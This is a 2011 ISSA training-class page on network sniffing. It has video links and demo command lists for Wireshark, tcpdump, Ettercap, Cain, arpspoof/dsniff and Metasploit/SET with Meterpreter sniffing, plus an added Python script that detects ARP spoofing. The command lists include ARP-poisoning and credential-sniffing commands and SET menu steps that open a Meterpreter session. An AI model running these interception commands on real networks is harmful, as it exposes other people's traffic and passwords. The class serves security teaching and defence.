Network Sniffers Class for the Kentuckiana ISSA 2011

This time Gary Hampton joins me to impart his knowledge of using Wireshark to diagnose problems on wireless networks. I cover the usual suspects: TCPDump, Metasploit sniffing with Meterpreter, ARP poisoning, Ettercap, Cain, NetworkMiner, Firesheep and Xplico. I lost part of Gary's on-screen demo when my recording rig froze up, and I apparently did not make a proper sacrifice to the demo gods for my section when I tried to show off Ettercap filters, but I hope you still find it informative.


Part 1: Intro to Sniffers


Sniffers Class Part 1 from Adrian Crenshaw on Vimeo.

Download: http://www.archive.org/download/IssaSniffersClass/sniffers1.avi

Part 2: Wireshark and Wireless with Gary Hampton

Sniffers Class Part 2 from Adrian Crenshaw on Vimeo.


Download: http://www.archive.org/download/IssaSniffersClass/sniffers2.avi

Part 3: A little more Wireshark, TCPDump, Metasploit sniffing with Meterpreter, ARP poisoning, Ettercap, Cain, NetworkMiner, Firesheep, Xplico and bridging.


Sniffers Class Part 3 from Adrian Crenshaw on Vimeo.

Commands used:

Wireshark Demo

1. Run Wireshark
2. Basic start capture
3. Start capture with options
4. Drill down OSI
5. Capture filter options (4.9 in book)
    not tcp port 3389
    not broadcast and not multicast
6. Show a packet
7. Pop a packet out
8. Sort by columns
9. Follow stream (web traffic)
10. Export HTTP Objects
11. Simple view filters
    tcp.port == 80
    !(ip.addr == 192.168.1.13)
12. Filter builder
13. Apply filters from different panes (packet vs. details panes)
14. Save filters
15. Open a Wiki page
16. Edit -> Find packet
17. Analyze -> Expert Info
18. Analyze -> Firewall ACLs
19. Stats
20. Color rules
21. Save capture
22. Mention Lua
Dumpcap/TCPDump
    dumpcap -D
    dumpcap -i eth0 -s 0 -f "port 80" -w webtraffic.pcap
Sniffing in Monitor mode
   ifconfig wlan0 down
   iwconfig wlan0 mode monitor
   iwconfig wlan0 channel 1
   ifconfig wlan0 up
Ettercap Demo
1. ettercap -T -q -i eth0 -M ARP // //
2. ettercap -T -q -i eth0 -M ARP // /10.1.1.1/
3. Show ARP traffic
4. Telnet to 10.1.1.1
5. HTTP to 10.1.1.1
6. FTP/Telnet/HTTP someplace with a password
7. Show how to find sniffers (promiscuous-mode hosts)
    ettercap -G
    ettercap -T -i eth0 -P list
    ettercap -T -i eth0 -P search_promisc //
8. Filters:
    etterfilter ig.filter -o ig.ef
    ettercap -T -q -F ig.ef -M ARP // //
9. Mention MITM: icmp, dhcp, port filters
10. driftnet -i eth0
11. Etherape
Cain Demo
1. Start poisoning
2. Telnet to 10.1.1.1
3. HTTP to 10.1.1.1
4. FTP/Telnet/HTTP someplace with a password
5. SSL someplace from VM
6. Sniff RDP
ARPSpoof Demo
    cat /proc/sys/net/ipv4/ip_forward
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i eth0 10.0.0.1
    arpspoof -i eth0 -t 10.0.0.113 10.0.0.1
    dsniff -i eth0 -c
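The "Show ARP traffic" step in the Ettercap demo and the arpspoof commands above both leave the same footprint on the wire: the gateway's IP address is suddenly claimed by a second MAC address. Below is an added example (my own code, not part of the class materials or of ettercap, arpspoof or Wireshark) that reads a classic libpcap capture such as the out.cap/webtraffic.pcap files written elsewhere on this page, decodes the ARP frames, and reports every IP claimed by more than one sender MAC. The capture used when no file is given is constructed inline; the 10.0.0.1 gateway and 10.0.0.113 victim follow the demo, the MAC addresses are sample locally administered values, and function names such as find_arp_conflicts and sample_capture are my own.

```python
import struct
from collections import defaultdict

PCAP_MAGIC_LE = 0xA1B2C3D4   # magic read little-endian from a little-endian pcap
PCAP_MAGIC_BE = 0xD4C3B2A1   # the same bytes read little-endian from a big-endian pcap
LINKTYPE_ETHERNET = 1
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = b"\xff" * 6
ZERO_MAC = b"\x00" * 6


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def build_arp_frame(opcode, sender_mac, sender_ip, target_mac, target_ip, dst_mac):
    """Constructed Ethernet II + ARP frame (sample data, not a real capture)."""
    eth = dst_mac + sender_mac + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)   # hw=Ethernet, proto=IPv4
    return eth + arp + sender_mac + sender_ip + target_mac + target_ip


def build_pcap(frames):
    """Wrap frames in a minimal little-endian classic pcap file (Ethernet link type)."""
    header = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    records = b""
    for i, frame in enumerate(frames):
        records += struct.pack("<IIII", 1300000000 + i, 0, len(frame), len(frame)) + frame
    return header + records


def iter_pcap_frames(data):
    """Yield raw link-layer frames from classic pcap bytes (pcapng is not handled)."""
    (magic,) = struct.unpack_from("<I", data, 0)
    if magic == PCAP_MAGIC_LE:
        endian = "<"
    elif magic == PCAP_MAGIC_BE:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    (linktype,) = struct.unpack_from(endian + "I", data, 20)
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled here")
    offset = 24
    while offset + 16 <= len(data):
        _sec, _usec, incl_len, _orig_len = struct.unpack_from(endian + "IIII", data, offset)
        offset += 16
        yield data[offset:offset + incl_len]
        offset += incl_len


def parse_arp(frame):
    """Return the ARP fields of a frame, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42:
        return None
    (ethertype,) = struct.unpack_from("!H", frame, 12)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, opcode = struct.unpack_from("!HHBBH", frame, 14)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "opcode": opcode,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": ip_str(frame[38:42]),
    }


def find_arp_conflicts(pcap_bytes):
    """Map each IP claimed by more than one sender MAC to the sorted list of those MACs."""
    claims = defaultdict(set)
    for frame in iter_pcap_frames(pcap_bytes):
        arp = parse_arp(frame)
        if arp is None:
            continue
        # Requests and replies both carry the sender's own IP/MAC binding.
        claims[arp["sender_ip"]].add(arp["sender_mac"])
    return {ip: sorted(macs) for ip, macs in claims.items() if len(macs) > 1}


def sample_capture():
    """Constructed three-frame capture: a normal ARP exchange, then a spoofed reply."""
    gw_ip, victim_ip = bytes([10, 0, 0, 1]), bytes([10, 0, 0, 113])
    gw_mac = bytes.fromhex("020000000001")        # sample locally administered MACs
    victim_mac = bytes.fromhex("020000000071")
    attacker_mac = bytes.fromhex("020000000099")
    return build_pcap([
        build_arp_frame(ARP_REQUEST, victim_mac, victim_ip, ZERO_MAC, gw_ip, BROADCAST),
        build_arp_frame(ARP_REPLY, gw_mac, gw_ip, victim_mac, victim_ip, victim_mac),
        build_arp_frame(ARP_REPLY, attacker_mac, gw_ip, victim_mac, victim_ip, victim_mac),
    ])


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else sample_capture()
    for ip, macs in find_arp_conflicts(data).items():
        print(f"{ip} claimed by {len(macs)} MACs: {', '.join(macs)}")
```

Run it with a capture file as the first argument, or with no arguments to see the constructed sample flagged. Wireshark reaches the same conclusion on its own: its ARP dissector raises a "duplicate IP address detected" Expert Info warning on the conflicting frame, which is the quickest thing to look for while stepping through the ARP traffic in the demo. Two MACs for one IP is a strong signal but not proof; a replaced NIC or a router failover pair also produces it, so check whether the second MAC belongs to a known host and how quickly the change happened. On the prevention side, dynamic ARP inspection with DHCP snooping on the switch, or a static ARP entry for the gateway on critical hosts, stops the poisoning the demo relies on.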
NetworkMiner
1. TCP fingerprinting
2. Host details
3. DHCP fingerprinting
4. File capture
5. Passwords
6. Plaintext
7. Open pcap
Bridging in Linux setup
    sudo apt-get install bridge-utils
Script to set up MAC bridging:
    ifconfig eth0 0.0.0.0
    ifconfig eth1 0.0.0.0
    brctl addbr mybridge
    brctl addif mybridge eth0
    brctl addif mybridge eth1
    ifconfig mybridge up
Things to show while bridged
    ifconfig
    sudo tcpdump -i mybridge -s 0 -w out.cap
    sudo etherape -i mybridge
    sudo driftnet -i mybridge
Metasploit/SET
   Backtrack->Penetration->SET
   Menu Choices 2, 1, 2 (Google.com), 2, 2, default, no
   <go to page>
   sessions -i 1
   use sniffer
   help
   sniffer_interfaces
   sniffer_start 2
   sniffer_dump 2 /tmp/all.cap
   <Show in Wireshark>